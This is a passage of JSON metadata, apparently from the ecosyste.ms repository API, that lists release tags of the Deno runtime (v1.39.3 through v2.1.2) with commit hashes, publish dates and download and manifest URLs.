1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyst